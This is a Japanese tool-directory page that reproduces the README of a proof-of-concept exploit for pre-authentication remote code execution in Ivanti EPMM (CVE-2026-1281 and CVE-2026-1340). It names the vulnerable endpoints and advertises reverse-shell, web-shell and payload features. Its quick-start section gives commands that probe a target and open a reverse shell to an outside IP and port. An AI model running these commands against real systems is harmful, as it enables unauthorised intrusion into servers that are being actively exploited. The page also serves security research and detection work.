Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — # CVE-2026-1281 & CVE-2026-1340 の概念実証 - Bash 算術展開を介した Ivanti EPMM 事前認証 RCE | Kitploit
ツール/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# CVE-2026-1281 & CVE-2026-1340 の概念実証 - Bash 算術展開を介した Ivanti EPMM 事前認証 RCE

リポジトリを見る
61238ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ 免責事項: このPoCは教育およびセキュリティ研究の目的のみで提供されています。明示的な許可なく使用することは違法です。

🎯 説明

Ivanti Endpoint Manager Mobile (EPMM) に影響を与える CVE-2026-1281 および CVE-2026-1340 の脆弱性を悪用するための完全な Proof of Concept (PoC) です。これらの脆弱性により、Bash Arithmetic Expansion メカニズムを介して認証なしでリモートからの任意コード実行 (RCE) が可能になります。

脆弱性

  • CVE-2026-1281 : /mifs/c/appstore/fob/ エンドポイントでのコードインジェクション
  • CVE-2026-1340 : /mifs/c/aftstore/fob/ エンドポイントでのコードインジェクション
  • CVSSスコア : 9.8 (Critical)
  • 悪用状況 : 実環境で活発に悪用中 (Zero-Day)

🚀 機能

  • ✅ 自動化された検証フレームワーク (8テスト)
  • ✅ Pre-Auth RCE エクスプロイト
  • ✅ 自動リバースシェル
  • ✅ Webシェルの展開
  • ✅ 50以上の即戦力ペイロード
  • ✅ Blue Team向け検出スクリプト
  • ✅ 完全なドキュメント

📦 インストール

git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 クイックスタート

# 脆弱性テスト
python3 exploit.py -t https://target.com -c

# RCE検証
python3 exploit.py -t https://target.com --test-rce

# リバースシェル
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 ドキュメント

  • 完全なREADME - 詳細な技術ドキュメント
  • 使用ガイド - ステップバイステップガイド
  • ペイロード - 50以上のペイロードコレクション
  • Red Teamガイド - 運用シナリオ

🔗 リファレンス

  • CERT-FR CERTFR-2026-ALE-001
  • Watchtowr Labs Analysis
  • CVE-2026-1281
  • CVE-2026-1340

👤 著者

Mehdi Le Deaut - サイバーセキュリティコンサルタント | Red Teamスペシャリスト

LinkedIn

⚖️ ライセンス

このプロジェクトはMITライセンスの下で提供されています - 詳細については LICENSE ファイルを参照してください。

🙏 謝辞

  • 迅速なアラートを提供してくれたCERT-FR
  • 技術分析を提供してくれたWatchtowr Labs
  • サイバーセキュリティコミュニティ
ツールをダウンロード